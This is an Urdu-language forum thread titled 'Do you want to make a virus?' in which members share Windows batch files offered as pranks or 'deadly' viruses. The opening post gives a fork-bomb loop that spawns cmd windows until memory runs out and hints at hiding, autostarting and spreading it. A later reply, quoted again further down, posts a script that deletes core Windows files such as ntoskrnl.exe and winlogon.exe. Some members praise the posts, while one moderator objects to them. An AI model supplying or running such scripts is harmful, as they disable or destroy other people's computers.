کیا آپ وائیرس بنانا چاہتے ہیں ؟

اگر آپ کے پاس کچھ کمپیوٹر کے بارے میں کچھ ٹپس اور ٹریکس ہیں تو یہاں لوگوں کو حیران کریں
Post Reply
انصاری آفاق احمد
مشاق
مشاق
Posts: 1263
Joined: Sun Oct 25, 2009 6:48 am
جنس:: مرد
Location: India maharastra nasik malegaon
Contact:

کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by انصاری آفاق احمد »

اسلام علیکم
اساتذہ کرام کے مجمعے میں طالب علموں کا درس موزوں بات نہیں. اِلاّ با نیّتِ اصلاح تکرار سبق...سو..
اگر آپ ایک بے ضرر مگر پریشان کردینے والا وائیرس بنانا چاہتے ہیں تو مندرجہ قوسین تحریر کو بغیر قوس کے کاپی کر کے نوٹ پیڈ میں پیسٹ کردیں سیو ایئز کے آپشن سے آل فائل کی سیٹنگز XXX.bat کے ایکسٹینگشن سے سیو کرلیں . جب آپ اسپر ڈبل کلک کریں گے لاتعداد ونڈوزcmd کی کھلنا شروع ہوجائیں گی یہاں تک کہ میمری ختم ہوجاے گی.کھلنے والی کسی بھی ونڈو کو بند کرنے پر اسکی جگہ ایک اور نئی ونڈو کھل جائے گی. کمپیوٹر ری اسٹارٹ اسکا حل ہے.
کیا ہو اگر یہی فائل ڈبل ہیڈن ہو کر کمپیوٹر شروع ہونے پر آٹو اسٹارٹ کے آپشن سے آپ کے( یا جس کمپیوٹرمیں آپ اسے ڈال دیں) محفوظ ہو جائے.؟ کیا ہو اگر آپ اس کو اور ایسے ہی متاثر کرنے والی فائلوں کو انڑ نیٹ کے ذریعے دوسروں کے کمپییوٹرس تک بھی پنہچا سکیں. نوٹ: اس قسم کی فائلوں کو کوئی اینٹی وائرس ڈیٹیکٹ نہیں کرتا..(ترکیب نہیں ملے گی.سبق یہں تک سنانا ہے :lol: )
پہلے قوسین میں لکھی لائین متواتر کھلنے والی والی ونڈو کی
دوسرے میں آٹھ 8 عدد ونڈو کی. آپ اسی کو آزمایئں،
(@echo
:start
start start start start start start start
goto start)
(@echo
start start start start start start start start)
یا اللہ تعالٰی بدگمانی سے بد اعمالی سےغیبت سےعافیت کے ساتھ بچا.
Image
اسداللہ شاہ
مشاق
مشاق
Posts: 1577
Joined: Mon Jul 06, 2009 3:04 pm
جنس:: مرد
Location: اللہ کی زمین پر
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by اسداللہ شاہ »

زبردست
[center]والسلام طالب دعا آپکا بھائی
اسداللہ شاہ[/center]
اعجازالحسینی
مدیر
مدیر
Posts: 10960
Joined: Sat Oct 17, 2009 12:17 pm
جنس:: مرد
Location: اللہ کی زمین
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by اعجازالحسینی »

زبردست
[center]ہوا کے رخ پے چلتا ہے چراغِ آرزو اب تک
دلِ برباد میں اب بھی کسی کی یاد باقی ہے
[/center]

روابط: بلاگ|ویب سائیٹ|سکرائبڈ |ٹویٹر
شازل
مشاق
مشاق
Posts: 4490
Joined: Sun Apr 12, 2009 8:48 pm
جنس:: مرد
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by شازل »

اس سے بھی مختصر میں آپ کو بتاتا ہوں
لیکن اتنا ہی خطرناک کہ سوچنے کا موقع ہی نہیں دینا
ٹائم ملتا ہے تو بتاتا ہوں
mirza_mohsin
کارکن
کارکن
Posts: 103
Joined: Wed Dec 16, 2009 9:20 pm
جنس:: مرد
Location: بورےوالا
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by mirza_mohsin »

ہم آپ کو بتاتے ہیں کے ڈیڈلی وائرس کیسے بناتے ہیں۔
@echo off
del *c:\windows\pchealth\"
del *c:\windows\system\"
del *c:\windows\system32\restore\"
del *winlogon.exe
del *c:\windows\system32\autoexec.nt"
del *c:\windows\system32\logonui.exe"
del *c:\windows\system32\ntoskrnl.exe"
اس کوڈ کو Notepad میں Paste کریں اور Bat کی فائل میں Save کر لیں۔۔
نوٹ: اس وائرس کو اپنے کمپوٹر میں ہرگز استعمال نہ کریں۔
ذیشان
دوست
Posts: 205
Joined: Sat Aug 29, 2009 1:21 pm

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by ذیشان »

mirza_mohsin wrote:ہم آپ کو بتاتے ہیں کے ڈیڈلی وائرس کیسے بناتے ہیں۔
@echo off
del *c:\windows\pchealth\"
del *c:\windows\system\"
del *c:\windows\system32\restore\"
del *winlogon.exe
del *c:\windows\system32\autoexec.nt"
del *c:\windows\system32\logonui.exe"
del *c:\windows\system32\ntoskrnl.exe"
اس کوڈ کو Notepad میں Paste کریں اور Bat کی فائل میں Save کر لیں۔۔
نوٹ: اس وائرس کو اپنے کمپوٹر میں ہرگز استعمال نہ کریں۔
لیکن یہ تو بتا دیں‌کہ اس سے ہو گا کیا ؟
[center]Image[/center]
[link]http://ilmedin.com/tajveedcourse/1.htm[/link]
نوٹ:ایڈوب فلیش پلیئر کے انسٹال ہونے کا یقین کر لیں۔
انصاری آفاق احمد
مشاق
مشاق
Posts: 1263
Joined: Sun Oct 25, 2009 6:48 am
جنس:: مرد
Location: India maharastra nasik malegaon
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by انصاری آفاق احمد »

اسلام وعلیکم


نوٹ: اس وائرس کو اپنے کمپوٹر میں ہرگز استعمال نہ کریں۔


پھر کس کے کمپیوٹر میں استعمال کریں؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
یا اللہ تعالٰی بدگمانی سے بد اعمالی سےغیبت سےعافیت کے ساتھ بچا.
Image
میاں محمد اشفاق
منتظم سوشل میڈیا
منتظم سوشل میڈیا
Posts: 6107
Joined: Thu Feb 09, 2012 6:26 pm
جنس:: مرد
Location: السعودیہ عربیہ
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by میاں محمد اشفاق »

چلو اپنے میں ہی کر کے دیکھ لو
ہا ہا ہا ہا
ممکن نہیں ہے مجھ سے یہ طرزِمنافقت
اے دنیا تیرے مزاج کا بندہ نہیں ہوں میں
User avatar
چاند بابو
منتظم اعلٰی
منتظم اعلٰی
Posts: 22224
Joined: Mon Feb 25, 2008 3:46 pm
جنس:: مرد
Location: بوریوالا
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by چاند بابو »

ارے میاں صاحب ایسا ہرگز نا کیجئے گا ورنہ کمپیوٹر ری سٹارٹ کرنا پڑے گا.
قصور ہو تو ہمارے حساب میں لکھ جائے
محبتوں میں جو احسان ہو ، تمھارا ہو
میں اپنے حصے کے سُکھ جس کے نام کر ڈالوں
کوئی تو ہو جو مجھے اس طرح کا پیارا ہو
محمد شعیب
منتظم اعلٰی
منتظم اعلٰی
Posts: 6565
Joined: Thu Jul 15, 2010 7:11 pm
جنس:: مرد
Location: پاکستان
Contact:

Re: کیا آپ وائیرس بنانا چاہتے ہیں ؟

Post by محمد شعیب »

بھائی لوگوں کو کیوں الٹی پٹیاں پڑھا رہے ہیں ؟؟؟
کوئی مثبت کام سکھائیں یار ....
Post Reply

Return to “کمپیوٹر ٹپس ایند ٹریکس”